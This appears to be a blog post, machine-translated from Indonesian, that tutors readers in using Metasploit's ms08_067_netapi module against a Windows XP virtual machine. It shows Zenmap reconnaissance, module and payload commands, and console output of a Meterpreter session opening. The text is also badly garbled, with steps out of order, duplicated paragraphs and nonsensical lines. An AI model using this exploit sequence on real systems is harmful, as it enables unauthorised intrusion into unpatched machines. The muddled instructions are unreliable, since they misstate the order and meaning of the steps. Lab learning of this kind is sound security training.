and
now we've been able to perform exploitaion against windows xp in virtual -box
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on
192.168.56.1:4444
[*] Automatically detecting the
target...
[*] Fingerprint: Windows XP -
Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3
English (AlwaysOn NX)
[*] Attempting to trigger the
vulnerability...
[*] Sending stage (752128 bytes) to
192.168.56.101
[*] Meterpreter session 1 opened
(192.168.56.1:4444 -> 192.168.56.101:1035) at 2012-09-15 03:09:55 +0700
msf
exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
RHOST which we live setting. we can be when we
do scaning using Zenmap on the first stage earlier. the ip addresses target. my friends here we can see a gap in the system-on RHOST (who was given a yellow sign)
The
tnext step saw a gap that can be entered by using the : command show options
set payload windows/shell_bind_tcp
example
in the picture :
and
the set is the first payload. set the payload and the data follow the show last
payload.
regulator payload used by Linuxx86 platform to a target when the shell is mounted.
To put on the target shell to we should look at the payload of existing service data to be able to enter in its later. command : show Payload
regulator payload used by Linuxx86 platform to a target when the shell is mounted.
To put on the target shell to we should look at the payload of existing service data to be able to enter in its later. command : show Payload
then we
will mengcek expoit that can be entered by using the command. show exploits.
of the command show exploits before you will take
one of the data and try again - to be able to re-enter into the next stage.I'm here trying to exploit the data:
use exploit/window/smb/ms08_067_netapi
The first open metasploit
on backtrack toolls that exist in and plilih msfconsole.then do check using the command seacrh smb.
well here we will know all smb sought earlier.
Before we exploit, we need to find
information about target. We can use zenmap After that we can use msfconsole
and typing search smb.
"Introduction to Metasploit"
penetration metasploit framework is a tool which is powerful enough to perform penestrasi into a system.metasploit framework can also be regarded as a development platform to create and exploit security tool
"Introduction to Metasploit"
penetration metasploit framework is a tool which is powerful enough to perform penestrasi into a system.metasploit framework can also be regarded as a development platform to create and exploit security tool
Tidak ada komentar:
Posting Komentar